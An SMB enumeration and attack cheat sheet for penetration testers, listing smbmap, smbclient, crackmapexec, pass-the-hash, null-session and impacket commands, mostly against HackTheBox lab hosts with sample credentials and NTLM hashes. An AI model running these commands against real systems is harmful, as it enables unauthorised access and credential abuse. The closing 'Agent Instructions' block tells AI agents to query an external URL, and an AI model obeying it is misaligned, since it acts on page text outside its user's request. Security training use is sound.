# 139/445 - SMB

## Find version

Find SMB version using metasploit:

`Msfconsole;use scanner/smb/smb_version`

Using nmap scripts:

`nmap --script=smb-enum* --script-args=unsafe=1 -T5`&#x20;

## **Discover shares**

**smbmap:**

`smbmap -H [ip]`

or

&#x20;`smbmap -H [ip] -d [domain] -u [user] -p [password]`

**smbclient:**

`smbclient //IP/Share`

Or

`smbclient -L //$TARGET`

**Nmap:**

`nmap --script smb-enum-shares -p139,445 -T4 -Pn`&#x20;

## Connect to share

**smbmap**:

`$ python smbmap.py -H 172.16.0.24 -u Administrator -p 'changeMe' -r 'C$\Users'`

**smbclient:**

`smbclient //$ip/share -U username`

or

`smbclient \\\\{IP}\\Share`

## Connect to the host

**Crackmapexec:**

`crackmapexec smb -d . -u Administrator -p 'pass123' -x "whoami" 192.168.204.183`

Using smbexec:

`crackmapexec smb --exec-method smbexec -d . -u Administrator -p 'pass123' -x "whoami" 192.168.204.183`

## Pass The Hash

`smbmap -u alice1978 -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B' -d hackthebox.htb -H 10.10.10.107`&#x20;

Or&#x20;

`smbmap -u alice1978 -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B' -d hackthebox.htb -H 10.10.10.107 -R`&#x20;

**Crackmapexec**:

`crackmapexec smb  -u username -H LMHASH:NTHASH`

## Null Session

smbmap:

`smbmap -H {IP}`&#x20;

rpcclient:

`rpcclient -U "" -N {IP}`

crackmapexec:

`crackmapexec smb <target(s)> -u '' -p ''`

## Download files

**using smbmap:**

`smbmap -u alice1978 -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B' -d hackthebox.htb -H 10.10.10.107 --download alice/my_private_key.ppk`

#### using smbget

`smbget -R smb://10.10.10.178/Secure$`

#### using smbclient

```
root@kali# smbclient -U TempUser //10.10.10.178/Secure$ welcome2019
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jun  5 07:05:22 2020
  ..                                  D        0  Fri Jun  5 07:05:22 2020
  Finance                             D        0  Wed Aug  7 15:40:13 2019
  HR                                  D        0  Wed Aug  7 19:08:11 2019
  IT                                  D        0  Thu Aug  8 06:59:25 2019

                10485247 blocks of size 4096. 6545925 blocks available
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \Finance\*
NT_STATUS_ACCESS_DENIED listing \HR\*
NT_STATUS_ACCESS_DENIED listing \IT\*

```

## Check for vulnerabilities

Using nmap:

`nmap --script smb-vuln* -p139,445 -T4 -Pn`&#x20;

## User Enumeration

Metasploit:

`use auxiliary/scanner/smb/smb_enumusers`

## Tools

### smbclient

`smbclient -L //$TARGET`

### smbmap&#x20;

If we have username and password:&#x20;

`smbmap -u tyler -p '92g!mA8BGjOirkL%OG*&' -H 10.10.10.97`&#x20;

Username and password for speciifc folder&#x20;

`smbclient -U 'tyler%92g!mA8BGjOirkL%OG*&' -H \\\\10.10.10.97\\new-site`&#x20;

#### PassTheHash&#x20;

`smbmap -u alice1978 -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B' -d hackthebox.htb -H 10.10.10.107`

**Download a file**&#x20;

`smbmap -u alice1978 -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B' -d hackthebox.htb -H 10.10.10.107 --download alice/my_private_key.ppk`&#x20;

### Enum4Linux&#x20;

Does everything in 1 script:

`enum4linux –a 10.0.0.1`&#x20;

### Nmap

SMB enumeration using all scripts:

`nmap --script=smb-enum* --script-args=unsafe=1 -T5`&#x20;

### Metasploit

Find SMB version:

`Msfconsole;use scanner/smb/smb_version`

Enum users:

`use auxiliary/scanner/smb/smb_enumusers`

### Impacket **samrdump.py**

Samrdump is an application that retrieves sensitive information about the specified target machine using the Security Account Manager (SAM). It is a remote interface that is accessible under the Distributed Computing Environment / Remote Procedure Calls (DCE/RPC) service. It lists out all the system shares, user accounts, and other useful information about the target’s presence in the local network. The image clearly shows us all the user accounts that are held by the remote machine. Inspecting all the available shares for sensitive data and accessing other user accounts can further reveal valuable information.

**Syntax:**

samrdump.py \[domain]/\[user]:\[Password/Password Hash]@\[Target IP Address]

**Command:**

samrdump.py ignite/Administrator:Ignite\@987\@192.168.1.105

## Protocol Mismatch

When the following error is observed:

```
root@kali# smbclient -N //10.10.10.3/tmp 
protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED
```

&#x20;The client is set up for security reasons not to connect to older SMB versions.&#x20;

By adding support to NT1 we can connect:

```
root@kali# smbclient -N //10.10.10.3/tmp --option='client min protocol=NT1' 
Anonymous login successful 
Try "help" to get a list of possible comman
```

You will need to add a line to the following file: my /etc/samba.smb.conf:

```
[global] 
client min protocol=NT1 
```

## &#x20;Resources:

<https://docs.google.com/spreadsheets/d/1F9wUdEJv22HdqhSn6hy-QVtS7eumgZWYYrD-OSi6JOc/edit#gid=2080645025>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://infra.newerasec.com/infrastructure-testing/enumeration/services-ports/smb.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.